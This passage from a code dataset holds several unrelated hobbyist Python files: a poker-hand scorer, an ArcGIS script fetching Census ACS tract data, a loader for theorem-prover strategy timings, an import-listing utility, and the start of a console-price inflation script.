variables which helps to score some combinations.\n self.temp_score1 = 0\n self.temp_score2 = 0\n \n # Start checking from the best combinations.\n # Check for a royal and street flush, and flush itself.\n if 5 in self.rsuits:\n if sorted(self.dictionary['numbers']) == [10, 11, 12, 13, 14]:\n self.combination = \"Royal Flush\"\n self.score = 1\n return self.combination, self.score\n elif self.dif == 4 and max(self.rnum) == 1:\n self.combination = \"Straight Flush\"\n self.score = 15 - max(self.dictionary['numbers']) # max score - 9\n return self.combination, self.score\n else:\n self.combination = \"Flush\"\n self.temp_score1 = (15 - sorted(self.dictionary['numbers'])[-1]) + \\\n (15 - sorted(self.dictionary['numbers'])[-2]) / 100 + \\\n (15 - sorted(self.dictionary['numbers'])[-3]) / 1_000 + \\\n (15 - sorted(self.dictionary['numbers'])[-4]) / 10_000 + \\\n (15 - sorted(self.dictionary['numbers'])[-5]) / 100_000\n self.score = 35 + self.temp_score1 # max score - 44.*****\n return self.combination, self.score\n\n # Check four of a kind.\n if 4 in self.rnum:\n self.combination = \"Four of a Kind\"\n for card in self.dictionary['numbers']:\n if self.dictionary['numbers'].count(card) == 4:\n self.score = 24 - card + self.highest_card() # max score - 22\n break\n return self.combination, self.score\n\n # Check full house.\n if sorted(self.rnum) == [2, 2, 3, 3, 3]:\n self.combination = \"Full House\"\n for card in self.dictionary['numbers']:\n if self.dictionary['numbers'].count(card) == 3:\n self.temp_score1 = 15 - card\n elif self.dictionary['numbers'].count(card) == 2:\n self.temp_score2 = (15 - card) / 100\n self.score = 22 + self.temp_score1 + self.temp_score2 # max score - 35.**\n return self.combination, self.score\n\n # Check straight.\n if self.dif == 4 and max(self.rnum) == 1:\n self.combination = \"Straight\"\n self.score = 59 - max(self.dictionary['numbers']) # max score - 53\n return self.combination, self.score\n\n # Check three of a kind.\n if 3 in self.rnum:\n self.combination = \"Three of a Kind\"\n for card in self.dictionary['numbers']:\n if self.dictionary['numbers'].count(card) == 3:\n self.temp_score1 = 15 - card\n break \n self.score = 53 + self.temp_score1 + self.highest_card() # max score - 66\n return self.combination, self.score \n\n # Check pair and two pairs.\n pairs = []\n for card in range(2, 15):\n if self.dictionary['numbers'].count(card) == 2:\n pairs.append(card)\n if len(pairs) == 1:\n self.combination = \"Pair\"\n self.temp_score1 = 15 - pairs[0]\n self.score = 78 + self.temp_score1 + self.highest_card() # max score - 91\n return self.combination, self.score\n elif len(pairs) == 2:\n self.combination = \"Two Pairs\"\n self.temp_score1 = 15 - max(pairs)\n self.temp_score2 = (15 - min(pairs)) / 100\n self.score = 66 + self.temp_score1 + self.temp_score2 + self.highest_card() # max score - 78.**\n return self.combination, self.score\n \n # If no combination - return the highest card.\n self.combination = \"The Highest Card\"\n self.score = 91 + self.highest_card()\n return self.combination, self.score\n\n def compare_with(self, other):\n if self.combination_search()[-1] > other.combination_search()[-1]:\n return \"Loss\"\n elif self.combination_search()[-1] < other.combination_search()[-1]:\n return \"Win\"\n else:\n return \"Tie\"\n\nstring = \"2H 2C 2S 3H 3D\"\nstring1 = \"3D 2H 3H 2C 2D\"\n\nme = PokerHand(string)\nopponent = PokerHand(string1)\nprint(me.combination_search())\nprint(opponent.combination_search())\nprint(me.compare_with(opponent))\n\ntest = {'card1': [13, 'S'], 'card2': [2, 'S'], 'card3': [5, 'S'], 'card4': [11, 'S'], 'card5': [10, 'S']}\nlist1 = [2, 3, 4, 4, 5]\n#print(list1.count(4))\nprint(me.highest_card())\nprint(opponent.highest_card())\n\n","repo_name":"Golovolastik/my_algorithms","sub_path":"codewars/ranking_poker_hands.py","file_name":"ranking_poker_hands.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1737726090","text":"## This script will grab population and language data from Census Bureau ACS API and output to Geodatabase of user's choice. Designed as a ArcGIS script tool.\r\n## Developed by Kayne Neigherbauer for Wisconsin Emergency Management Sept 2017\r\n\r\n#import modules\r\ntry:\r\n import sys, urllib2, json, string, csv, arcpy, os, socket\r\n from datetime import date\r\nexcept ImportError:\r\n sys.exit(\"Error importing 1 or more required modules.\")\r\n\r\ndef main():\r\n\r\n def fetchData(url):\r\n arcpy.AddMessage(\"Fetching Data...\")\r\n try:\r\n response = urllib2.urlopen(url)\r\n except urllib2.HTTPError as e:\r\n arcpy.AddMessage(\"HTTP Error: \" + str(e.code))\r\n return None\r\n except urllib2.URLError as e:\r\n arcpy.AddMessage(\"URL Error: \" + str(e.reason))\r\n return None\r\n else:\r\n code = response.getcode()\r\n if code == 200:\r\n # if success (200) then read the data\r\n data = json.load(response)\r\n if data == []:\r\n data = None\r\n #print json.dumps(data, indent =2)\r\n return data\r\n else:\r\n arcpy.AddMessage(\"Unsuccessful URL Data Request.\")\r\n return None\r\n \r\n def joinData(data,geom,dbpath,clip):\r\n \r\n #create temp data scratch GDB\r\n tempData = arcpy.CreateScratchName(workspace=arcpy.env.scratchGDB)\r\n arcpy.env.scratchWorkspace = tempData\r\n arcpy.env.overwriteOutput = True\r\n tempPath = arcpy.GetSystemEnvironment(\"TEMP\") \r\n ## some variables ##\r\n clipped = \"clipped\"\r\n tracts = \"tracts\"\r\n tracts_clip = \"tracts_clip\"\r\n final_tracts = \"final\"\r\n csv_file = os.path.join(tempPath,'census.csv')\r\n clipJSON = os.path.join(tempPath,'clip.json')\r\n \r\n #open and write data to file as csv with a header row\r\n with open(csv_file, 'wb') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(data.pop(0)) #header row\r\n for item in data:\r\n #strip the excess long digits for GEOID\r\n item[1] = item[1].lstrip('14000US')\r\n writer.writerows(data)\r\n with open(clipJSON, 'wb') as f:\r\n json.dump(clip, f)\r\n\r\n arcpy.AddMessage(\"Processing Data...\")\r\n fields = fieldsList\r\n if fields == ['B16001_001E','B16001_005E','B16001_020E','B16001_026E','B16001_068E','B16001_080E']:\r\n aliases = [\"Total - 5+ yrs of age\", \"Spanish or Spanish Creole: Speak English less than 'very well'\", \"German: Speak English less than 'very well'\", \"Other West Germanic languages: Speak English less than 'very well'\" , \"Chinese: Speak English less than 'very well'\" , \"Hmong: Speak English less than 'very well'\"]\r\n else:\r\n aliases = []\r\n # Geometry json to feature class\r\n #arcpy.JSONToFeatures_conversion(geomJSON, tracts)\r\n if arcpy.Exists(clipped):\r\n arcpy.Delete_management(clipped)\r\n arcpy.JSONToFeatures_conversion(os.path.join(tempPath,'clip.json'), clipped)\r\n # Convert csv to table\r\n if arcpy.Exists(\"csv_table\"):\r\n arcpy.Delete_management(\"csv_table\")\r\n arcpy.CopyRows_management(csv_file, \"csv_table\")\r\n # Add Field for string verison of GEOID\r\n arcpy.AddField_management(\"csv_table\", \"GID_TEXT\", \"TEXT\")\r\n # Calculate the new Field (GEOID)\r\n arcpy.CalculateField_management(\"csv_table\", \"GID_TEXT\", \"[GEO_ID]\")\r\n # Process: Add Join - join the table to the layer\r\n arcpy.JoinField_management(geom, \"GEOID\", \"csv_table\", \"GID_TEXT\")\r\n # Copy features to new file - saves join.\r\n if arcpy.Exists(\"new_tracts\"):\r\n arcpy.Delete_management(\"new_tracts\")\r\n arcpy.CopyFeatures_management(geom, \"new_tracts\")\r\n #get rid of text version of GEOID field\r\n arcpy.DeleteField_management(\"new_tracts\", [\"GID_TEXT\"])\r\n #Change field names and aliases.\r\n fList = arcpy.ListFields(\"new_tracts\")\r\n for f in fList: \r\n for i in range(0,len(fields)):\r\n if f.name == fields[i]:\r\n arcpy.AlterField_management(\"new_tracts\",f.name, fields[i], aliases[i])\r\n # Clip the census tracts to wi boundary\r\n if arcpy.Exists(tracts_clip):\r\n arcpy.Delete_management(tracts_clip)\r\n arcpy.Clip_analysis(\"new_tracts\", clipped, tracts_clip)\r\n # Copy to save field names\r\n if arcpy.Exists(final_tracts):\r\n arcpy.Delete_management(final_tracts)\r\n arcpy.AddMessage(\"Writing File...\")\r\n arcpy.CopyFeatures_management(tracts_clip, final_tracts)\r\n \r\n # Cleanup temp files\r\n arcpy.Delete_management(\"new_tracts\")\r\n arcpy.Delete_management(tracts_clip)\r\n arcpy.Delete_management(\"csv_table\")\r\n arcpy.Delete_management(csv_file)\r\n arcpy.Delete_management(tracts)\r\n arcpy.Delete_management(clipped)\r\n arcpy.Delete_management(clipJSON)\r\n \r\n ##clean up fields in case of bad data write - start a list of field names\r\n fcFieldList = set(arcpy.ListFields(dbpath))\r\n dataFieldList = set(arcpy.ListFields(final_tracts))\r\n newFieldList = []\r\n newFieldList.append(fcFieldList & dataFieldList)\r\n #set up cursors to update dataset feature class\r\n sfc = final_tracts #search cursor feature class\r\n ufc = dbpath\r\n with arcpy.da.SearchCursor(sfc, newFieldList) as sCur:\r\n with arcpy.da.UpdateCursor(ufc, newFieldList) as uCur:\r\n for sRow in sCur:\r\n for uRow in uCur:\r\n if sRow[1] == uRow[1]:\r\n uRow = [sRow]\r\n uCur.updateRow(uRow)\r\n break\r\n\r\n # Cleanup last temp file\r\n arcpy.Delete_management(final_tracts)\r\n arcpy.AddMessage(\"Census data updated.\")\r\n \r\n \r\n #set timeout for web requests\r\n timeout = 10\r\n socket.setdefaulttimeout(timeout)\r\n \r\n # path of workspace dataset\r\n global dbpath\r\n dbpath = arcpy.GetParameterAsText(0)\r\n geom = arcpy.GetParameterAsText(1)\r\n \r\n # current year\r\n global year\r\n year = date.today().year\r\n global acsYear\r\n acsYear = arcpy.GetParameterAsText(4)\r\n \r\n ## census api key\r\n key = arcpy.GetParameterAsText(2)\r\n ##census fields from user input\r\n fields = arcpy.GetParameterAsText(3) ##B16001_001E,B16001_005E,B16001_020E,B16001_026E,B16001_068E,B16001_080E\r\n global fieldsList\r\n fieldsList = fields.split(';')\r\n fieldsStr = string.join(fieldsList,',')\r\n arcpy.AddMessage(fieldsStr)\r\n arcpy.AddMessage(fieldsList)\r\n\r\n \r\n ### call functions ###\r\n # get data from ACS REST ENDs\r\n url = \"https://api.census.gov/data/{0}/acs/acs5?get=NAME,GEO_ID,COUNTY,{1}&for=tract:*&in=state:55&key={2}\".format(str(acsYear),fieldsStr,key)\r\n arcpy.AddMessage(url)\r\n #go get it\r\n data = fetchData(url)\r\n## while acsYear >= 2015:\r\n## # url for 2015 ACS 5yr estimate for:\r\n## # Language spoken at home by ability to speak english less than well, specific languages\r\n## url = \"https://api.census.gov/data/\" + str(acsYear) + \"/acs/acs5?get=NAME,GEO_ID,\" + fields + \"&for=tract:*&in=state:55&key=\" + key\r\n## arcpy.AddMessage(url)\r\n## #go get it\r\n## data = fetchData(url)\r\n## #try year before this one if no data\r\n## if data == None:\r\n## acsYear -= 1\r\n## else:\r\n## break\r\n\r\n # State boundary url from DMA public end point\r\n clipUrl = \"https://widmamaps.us/dma/rest/services/WEM/WI_State_Boundary/MapServer/0/query?where=STATE_FIPS+%3D+55&geometryType=esriGeometryEnvelope&spatialRel=esriSpatialRelIntersects&returnGeometry=true&f=json\"\r\n #go get it\r\n clip = fetchData(clipUrl)\r\n \r\n # join csv data with census tract layer geometry\r\n joinData(data,geom,dbpath,clip)\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"kaynen6/WEM_CensusACS5_Data","sub_path":"census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":8136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"8369738170","text":"'''\nCreated on May 15, 2014\n\n@author: Frank Dorssers\n'''\n\n# pylint: disable=C0103, E0611, W0141\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom src.GlobalVars import PATH\nfrom scipy.sparse import coo_matrix as smat\n\n\nclass DataSet(object):\n '''\n Class for loading, parsing and using Satallax and E data.\n\n This information contains problems (N), features (M) and\n strategy times (K).\n\n Variables\n ---------\n problems : 1 x N Numpy array\n Contains all problem names\n strategies : 1 x K Numpy array\n Contains all strategy names\n feature matrix : N x M Numpy array\n Contains all features for each problem\n strategy matrix : N x K numpy array\n Contains all times for each strategy and problem\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n self.feature_matrix = None\n self.strategy_matrix = None\n self.strategy_files = None\n self.strategies = None\n self.problems = None\n\n self.whitelist = ['protokoll_G', 'protokoll_H', 'protokoll_U']\n\n def mask(self, mask):\n '''\n Creates a masked copy of the current data\n '''\n copy = DataSet()\n copy.feature_matrix = self.feature_matrix[mask]\n copy.strategy_matrix = self.strategy_matrix[mask]\n copy.strategies = self.strategies\n copy.strategy_files = self.strategy_files\n copy.problems = self.problems[mask]\n return copy\n\n def sparsify(self):\n '''\n Creates a sparse version of the current strategy matrix\n '''\n self.strategy_matrix = (self.strategy_matrix > -1) * self.strategy_matrix\n self.strategy_matrix = smat(self.strategy_matrix)\n\n def load(self, data_type):\n '''\n Loads a certain data type, 'E' or 'Satallax'\n\n Parameters\n ----------\n data_type : string\n The name of the data type\n '''\n if data_type == 'E':\n self.parse_E_data()\n elif data_type == 'Satallax':\n self.parse_Satallax_data()\n else:\n raise IOError('Cannot parse unknown data type %s.'\n % data_type)\n\n def parse_Satallax_data(self): # NOQA\n '''\n Loads and parses Satallax data, this includes strategy names,\n strategy times, problem names and problem features.\n These are stored in variables in the class\n '''\n self.problems, self.feature_matrix = self.sat_load_features()\n satallax_files = [f for f in self.sat_get_strat_file_names() if f.endswith('.results')]\n satallax_strats = [self.sat_load_strat(sat) for sat in satallax_files]\n tmp_strategies = ['-m ' + sfile.replace('.results', '') for sfile in satallax_files]\n self.strategies = np.array(tmp_strategies)\n self.strategy_matrix = self.sat_generate_strat_matrix(self.problems, satallax_strats)\n\n def parse_E_data(self): # NOQA\n '''\n Loads and parses E data, this includes strategy names,\n strategy times, problem names and problem features.\n These are stored in variables in the class\n '''\n self.strategies = []\n self.strategy_files = []\n sdict = self.load_strategies()\n fdict = self.load_features(sdict)\n self.feature_matrix = self.generate_feature_matrix(fdict)\n self.strategy_matrix = self.generate_strategy_matrix(fdict)\n self.problems = np.array(fdict.keys())\n self.strategies = np.array(self.strategies)\n\n def is_relevant_strategy(self, strategy):\n '''\n Checks whether a certain strategy is a valid E strategy depending on the whitelist\n\n Parameters\n ----------\n strategy : string\n The name of the strategy that should be checked\n\n Returns\n -------\n result : boolean\n True if it is a relevant strategy\n '''\n return any(map(strategy.startswith, self.whitelist))\n\n def get_strategy_file_names(self, path=join(PATH, 'data/E/TESTRUNS_PEGASUS/')):\n '''\n Collects and returns all relevant filenames for 'E' strategies in a certain path\n\n Parameters\n ----------\n path : string\n Path to a folder which should be checked for strategy file names\n\n Returns\n -------\n result : list\n A list of strings containing all relevant strategy file names\n '''\n return [f for f in listdir(path) if\n isfile(join(path, f)) and self.is_relevant_strategy(f)]\n\n def load_strategies(self, path=join(PATH, 'data/E/TESTRUNS_PEGASUS/')):\n '''\n Loads all strategy file names, parses them and puts them in a list of\n dictionaries in the shape of {key : [[],[]]}, the initial list in the\n value will contain the strategy times\n\n Parameters\n ----------\n path : string\n Path to a folder which contains the strategy files\n\n Returns\n -------\n sdict : list\n List containing a dictionary for each strategy file in the shape\n of {key : [[],[]]}, the initial list containing the strategy times\n '''\n sfiles = self.get_strategy_file_names()\n sdict = dict()\n for sfile_i in range(len(sfiles)):\n sfile = sfiles[sfile_i]\n firstline = True\n with open(path + sfile, 'r') as inputstream:\n for line in inputstream:\n if firstline:\n firstline = False\n self.strategies.append(line[2:].strip())\n self.strategy_files.append(sfile)\n else:\n sline = line.split()\n if not sline[0] in sdict:\n sdict[sline[0]] = [-1 * np.ones(len(sfiles)), []]\n if sline[1] == 'T':\n sdict[sline[0]][0][sfile_i] = float(sline[2])\n return sdict\n\n def load_features(self, fdict, path=join(PATH, 'data/E/')):\n '''\n Loads the features file, parses it and adds them to the second\n list in the fdict\n\n Parameters\n ----------\n fdict : list\n List containing dictionaries in the shape of {key : [[],[]]}\n where the first list in the list contains strategy times and\n the second list will be filled with the features\n path : string\n Path to a folder which contains the features file\n\n returns\n -------\n fdict : list\n Same type and shape as the initial fdict parameter but with\n the second list in the value containing the parsed features\n '''\n ffile = 'pegasusFeatures'\n with open(path + ffile, 'r') as inputstream:\n firstline = True\n for line in inputstream:\n if firstline:\n firstline = False\n else:\n tmp = (line.strip()).split('#')\n key = tmp[0].split('/')[2]\n fdict[key][1] = [float(x) for x in tmp[1].split(',')]\n return fdict\n\n def generate_feature_matrix(self, fdict):\n '''\n Converts a list of dictionaries in the shape as the one generated by\n the 'load_features' and 'sat_load_features' functions and turns it\n into a N x M numpy array\n\n Parameters\n ----------\n fdict : list\n List of dictionaries containing all features for all problems as\n generated by the function 'load_features'\n\n Returns\n -------\n result : numpy array\n N x M array containing all features for all problems in the parameters\n '''\n total_features = []\n for key in fdict.keys():\n total_features.append(fdict[key][1])\n return np.array(total_features)\n\n def generate_strategy_matrix(self, sdict):\n '''\n Converts a list of dictionaries in the shape as the one generated by\n the 'load_strategies' function and turns it into a N x K numpy array\n\n Parameters\n ----------\n fdict : list\n List of dictionaries containing all strategy times for all problems as\n generated by the function 'load_strategies'\n\n Returns\n -------\n result : numpy array\n N x K array containing all strategy times for all problems in the parameters\n '''\n total_strategies = []\n for key in sdict.keys():\n total_strategies.append(sdict[key][0])\n return np.array(total_strategies)\n\n def sat_load_strat(self, filename, path=join(PATH, 'data/Satallax/results')):\n '''\n Loads a single Satallax strategy and puts it in a dictionary in the\n shape of {problem : time}\n\n Parameters\n ----------\n filename : string\n The name of the file containing the strategy data\n\n Returns\n -------\n new_strat : dictionary\n Contains all times for each solved problem, in the shape\n of {problem : time}\n '''\n new_strat = {}\n with open(join(path, filename), 'r') as inputstream:\n for line in inputstream:\n sline = line.split()\n new_strat[sline[0].split('/')[6]] = float(sline[1])\n return new_strat\n\n def sat_load_features(self):\n '''\n Loads and parses the feature names and actual features\n\n Returns\n -------\n Problems : 1 x N Numpy array\n Numpy array containing all problem names\n Features : N x M Numpy array\n Numpy array containing the actual features\n '''\n features_path = join(PATH, 'data', 'Satallax', 'Satallax_features')\n problems = []\n features = []\n with open(features_path, 'r') as f:\n for line in f:\n hashtag_split = line.split('#')\n problems.append(hashtag_split[0].split('/')[7])\n features.append(map(float, hashtag_split[1].replace('\\n', '').split(',')))\n return np.array(problems), np.array(features)\n\n def sat_generate_strat_matrix(self, probs, strat_dicts):\n '''\n Converts a list of dictionaries in the shape as the one generated by\n the 'sat_load_strat' function and turns it into a numpy array\n\n Parameters\n ----------\n probs : list\n List of all problem names\n strat_dicts : list\n Contains dictionaries as generated by 'sat_load_strat'\n\n Returns\n -------\n result : numpy array\n N x K array containing all strategy times for all problems in the parameters\n '''\n strategy_matrix = np.empty((len(probs), len(strat_dicts)))\n strategy_matrix[:] = -1\n index_dict = dict([index_item for index_item in zip(probs, range(len(probs)))])\n for col, strat in enumerate(strat_dicts):\n for prob in strat.keys():\n strategy_matrix[index_dict[prob], col] = strat[prob]\n return strategy_matrix\n\n def sat_get_strat_file_names(self, path=join(PATH, 'data/Satallax/results')):\n '''\n Collects and returns all relevant filenames for Satallax strategies in a certain path\n\n Parameters\n ----------\n path : string\n Path to a folder which should be checked for strategy file names\n\n Returns\n -------\n result : list\n A list of strings containing all relevant strategy file names\n '''\n return [f for f in listdir(path) if isfile(join(path, f))]\n","repo_name":"VanHElsing/VanHElsing","sub_path":"src/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":11714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"9808471053","text":"\"\"\"Summarise Python imports in a given context.\n\"\"\"\n\nimport argparse\nimport ast\nimport distutils.sysconfig\nimport json\nimport os\nimport pkgutil\nimport sys\nfrom typing import Any, Dict, Generator, List, Optional, Set\n\n_TRANSLATE = {\n \"pkg_resources\": \"setuptools\",\n}\n\n\ndef iter_code_cells(cells: List[Dict[str, Any]]) -> Generator[str, None, None]:\n \"\"\"Iterate over cells in a Jupyter notebook, yielding source code from code cells.\"\"\"\n for cell in cells:\n if cell[\"cell_type\"] == \"code\":\n yield \"\".join(cell[\"source\"])\n\n\nclass ImportCollector(ast.NodeVisitor):\n def __init__(self, ignore: Optional[List[str]] = None):\n super().__init__()\n self.imports = set()\n self.ignore = set(ignore) if ignore else set()\n\n def _push_name(self, name: str):\n if name not in self.ignore:\n self.imports.add(_TRANSLATE.get(name, name))\n\n def visit_Import(self, node: ast.Import):\n for alias in node.names:\n name, *_ = alias.name.split(\".\")\n self._push_name(name)\n\n def visit_ImportFrom(self, node: ast.ImportFrom):\n if node.module is not None:\n name = node.module\n if \".\" in name:\n name, *_ = name.split(\".\")\n if node.level == 0:\n self._push_name(name)\n\n\ndef gather_modules(path: str):\n for mod in pkgutil.walk_packages([path]):\n yield mod\n if mod.ispkg:\n subpath = os.path.join(mod.module_finder.path, mod.name)\n for submod in gather_modules(subpath):\n yield submod\n\n\ndef get_stdlib() -> Set[str]:\n \"\"\"Get a list of module names that (probably) comprises the Python standard\n library.\n \"\"\"\n std = distutils.sysconfig.get_python_lib(standard_lib=True)\n stdlib = set(mod.name for mod in pkgutil.iter_modules([std]))\n stdlib.update(sys.builtin_module_names)\n return stdlib\n\n\ndef handle_package(path: str):\n stdlib = get_stdlib()\n collector = ImportCollector(ignore=[os.path.basename(path)])\n for mod in gather_modules(path):\n path = mod.module_finder.path\n if mod.ispkg:\n continue\n with open(os.path.join(path, f\"{mod.name}.py\"), \"r\") as f:\n mod_str = f.read()\n nodes = ast.parse(mod_str)\n collector.visit(nodes)\n\n final = collector.imports - stdlib\n for mod in sorted(final):\n print(mod)\n\n\ndef handle_notebook(path: str):\n \"\"\"Parse cells from a notebook, extracting imports.\"\"\"\n stdlib = get_stdlib()\n with open(path) as ipy_file:\n data = json.load(ipy_file)\n # TODO: check this is a python notebook\n # meta = data['metadata']\n collector = ImportCollector()\n for cell in iter_code_cells(data[\"cells\"]):\n nodes = ast.parse(cell)\n collector.visit(nodes)\n\n final = collector.imports - stdlib\n for mod in sorted(final):\n print(mod)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Print non-standard-library imports made in a package, module or Jupyter notebook\"\n )\n parser.add_argument(\"path\")\n args = parser.parse_args()\n\n path = os.path.abspath(os.path.expanduser(args.path))\n if os.path.isdir(path):\n handle_package(path)\n elif path.endswith(\".ipynb\"):\n handle_notebook(path)\n else:\n print(f\"Unrecognised path: {args.path}\")\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kthwaite/wimp","sub_path":"wimp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7473919684","text":"\n# import modules from other libraries\nfrom __future__ import print_function\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport requests\nimport logging\nimport tablib\nimport argparse \n\nCPI_DATA_URL = 'http://research.stlouisfed.org/fred2/data/CPIAUCSL.txt'\n\nclass CPIData(object): #Class\n\n\t\"\"\"Abstraction of the CPI data provided by FRED.\n This stores internally only one value per year.\n \"\"\"\n\n\tdef __init__(self): #Methods\n\t\tself.year_cpi = {}\n\t\tself.last_year = None\n\t\tself.first_year = None\n\n\tdef load_from_url (self, url, save_as_file = None):\n\t\t\"\"\"Loads data from a given url. After fetching the file this implementation uses load_from_file\n internally.\n \"\"\"\n\n\t\tfp = requests.get(url, stream = True, headers = {'Accept-Encoding': None}).raw\n\n\t\tif save_as_file is None:\n\t\t\treturn self.load_from_file(fp)\n\n\t\telse:\n\t\t\twith open(save_as_file, 'wb+') as out:\n\t\t\t\twhile True:\n\t\t\t\t\tbuffer = fp.read(81920)\n\t\t\t\t\tif not buffer:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tout.write(buffer)\n\t\t\twith open(save_as_file) as fp:\n\t\t\t\treturn self.load_from_file(fp)\n\n\tdef load_from_file (self, fp):\n\t\t\"\"\"Loads CPI data from a given file-like object.\n\t\t\"\"\"\n\n\t\tcurrent_year = None\n\t\tyear_cpi = []\n\t\tfor line in fp:\n\t\t\twhile not line.startswith(\"DATE \"):\n\t\t\t\tpass\n\n\t\t\tdata = line.rstrip().split()\n\n\t\t\tyear = int(data[0].split(\"-\")[0])\n\t\t\tcpi = float(data[1])\n\n\t\t\tif self.first_year is None:\n\t\t\t\tself.first_year = year\n\n\t\t\tself.last_year = year\n\n\t\t\tif current_year != year:\n\t\t\t\tif current_year is not None:\n\t\t\t\t\tself.year_cpi[current_year] = sum(year_cpi) / len(year_cpi)\n\t\t\t\tyear_cpi = []\n\t\t\t\tcurrent_year = year\n\t\t\t\n\t\t\tyear_cpi.append(cpi)\n\n\t\tif current_year is not None and current_year not in self.year_cpi:\n\t\t\tself.year_cpi[current_year] = sum(year_cpi) / len(year_cpi)\n\n\tdef get_adjusted_price (self, price, year, current_year = None):\n\t\t\"\"\"Returns the adapted price from a given year compared to what current\n year has been specified.\n This essentially is the calculated inflation for an item.\n \"\"\"\n\n\t\tif current_year is None or current_year > 2013:\n\t\t\tcurrent_year = 2013\n\n\t\tif year < self.first_year:\n\t\t year = self.first_year\n\t\telif year > self.last_year:\n\t\t\tyear = self.last_year\n\n\t\tyear_cpi = self.year_cpi[year]\n\t\tcurrent_cpi = self.year_cpi[current_year]\n\t\t\n\t\treturn float(price) / year_cpi * current_cpi\n\nclass GiantbombAPI(object):\n\t\"\"\"Generator yielding platforms matching the given criteria. If no\n limit is specified, this will return *all* platforms.\n \"\"\"\n\t\n\tbase_url = 'http://www.giantbomb.com/api/'\n\n\tdef __init__(self, api_key):\n\t\tself.api_key = api_key\n\n\tdef get_Plaforms(self, sort = None, filter = None, field_list = None):\n\n\t\t# The following lines also do value-format conversions from what's\n # common in Python (lists, dictionaries) into what the API requires.\n\t\tparams = {}\n\t\tif sort is not None:\n\t\t\tparams['sort'] = sort\n\t\tif field_list is not None:\n\t\t\tparams['field_list'] = ','.join(field_list)\n\t\tif filter is not None:\n\t\t\tparams['filter'] = filter\n\t\t\tfor key,value in filter.iteritems():\n\t\t\t\tparsed_filters.append('{0}:{1}'.format(key, value))\n\t\t\tparams['filter'] = ','.join(parsed_filters)\n\n\t\t# append API key to the list of parameters\n\t\tparams['api_key'] = self.api_key\n\t\tparams['format'] = 'json' \n\n\t\t# Giantbomb's limit for items in a result set for this API is 100\n # items. But given that there are more than 100 platforms in their\n # database we will have to fetch them in more than one call.\n\t\tincomplete_result = True\n\t\tnum_total_results = None\n\t\tnum_fetched_results = 0\n\t\tCounter = 0\n\n\t\twhile incomplete_result:\n\t\t\tparams['offset'] = num_fetched_results\n\t\t\tresult = requests.get(self.base_url + '/ platforms', params = params)\n\t\t\tresult = result.json()\n\n\t\t\tif num_total_results is None:\n\t\t\t\tnum_total_results = int(result['number_of_total_results'])\n\t\t\tnum_fetched_results += int(result['number_of_page_results'])\n\t\t\tif num_fetched_results >= num_total_results:\n\t\t\t\tincomplete_result = False\n\t\t\tfor item in result['results']:\n\t\t\t\tlogging.debug(\"Yielding platform {0} of {1}\".format(counter + 1, num_total_results))\t\n\n\t\t\tif 'original_price' in item and item['original_price']:\n\t\t\t\titem['original_price'] = float(item['original_price'])\n\n\t\t\tyield item\n\t\t\tCounter += 1 \n\n\ndef is_valid_dataset(platform): #Function\n\n\t\"\"\"Filters out datasets that we can't use since they are either lacking\n a release date or an original price. For rendering the output we also\n require the name and abbreviation of the platform.\n\n \"\"\"\n\n\tif 'release_date' not in platform or not platform['release_date']:\n\t\tlogging.warn(u\"{0} has not release_date\".format(platform['name']))\n\t\treturn False\n\tif 'original_price' not in platform or not platform['original_price']:\n\t\tlogging.warn(u\"{0} has no original_price\".format(platform['name']))\n\t\treturn False\n\tif 'name' not in platform or not platform['name']:\n\t\tlogging.warn(u\"{0} has no platform name found for given dataset\")\n\t\treturn False\n\tif 'abbreviation' not in platform or not platform['abbreviation']:\n\t\tlogging.warn(u\"{0} has no abbreviation\".format(platform['name']))\n\t\treturn False\n\treturn True\n\n\ndef generate_plot(platforms, output_file): #Function\n\n\t\"\"\"Generates a bar chart out of the given platforms and writes the output\n into the specified file as PNG image.\n \"\"\"\n\n\tlabels = []\n\tvalues = []\n\n\tfor platform in platforms:\n\t\tname = platform['name']\n\t\tadapted_price = platform['adjusted_price']\n\t\tprice = platform['original_price']\n\n\t\tif price > 2000:\n\t\t\tcontinue\n\n\t\tif len(name) > 15:\n\t\t\tname = platform['abbreviation']\n\t\tlabels.insert(0, u\"{0}\\n$ {1}\\n$ {2}\".format(\n\t\t\tname, price, round(adjusted_price, 2)))\n\t\tvalues.insert(0, adapted_price)\n\n\twidth = 0.3\n\tind = np.arange(len(values))\n\tfig = plt.figure(figsize = (len(labels) * 1.8, 10))\n\n\tax = fig.add_subplot(1, 1, 1)\n\tax.bar(ind, values, width, align = 'center')\n\n\tplt.ylabel('adjusted_price')\n\tplt.xlabel('Year / Console')\n\tax.set_xticks(ind + 0.3)\n\tax.set_xticklabels(labels)\n\tfig.autofmt_xdate()\n\tplt.grid(True)\n\n\tplt.show(dpi = 72)\n\ndef generate_csv(platforms, output_file): #Function\n\t\n\t\"\"\"Writes the given platforms into a CSV file specified by the output_file\n parameter.\n \"\"\"\n\tdataset = tablib.Dataset(headers = ['Abbreviation', 'Name', 'Year', 'Price', 'Adjusted Price'])\n\n\tfor p in platforms:\n\t\tdataset.append([p['abbreviation'], p['name'], p['year'], p['original_price'], p['adjusted_price']])\n\n\t# If the output_file is a string it represents a path to a file which\n # we will have to open first for writing. Otherwise we just assume that\n # it is already a file-like object and write the data into it.\n \t\n\tif isinstance(output_file, basestring):\n\t\twith open(output_file, 'w+') as fp:\n\t\t\tfp.write(dataset.csv)\n\telse:\n\t\toutput_file.write(dataset.csv)\n\ndef parse_args(): 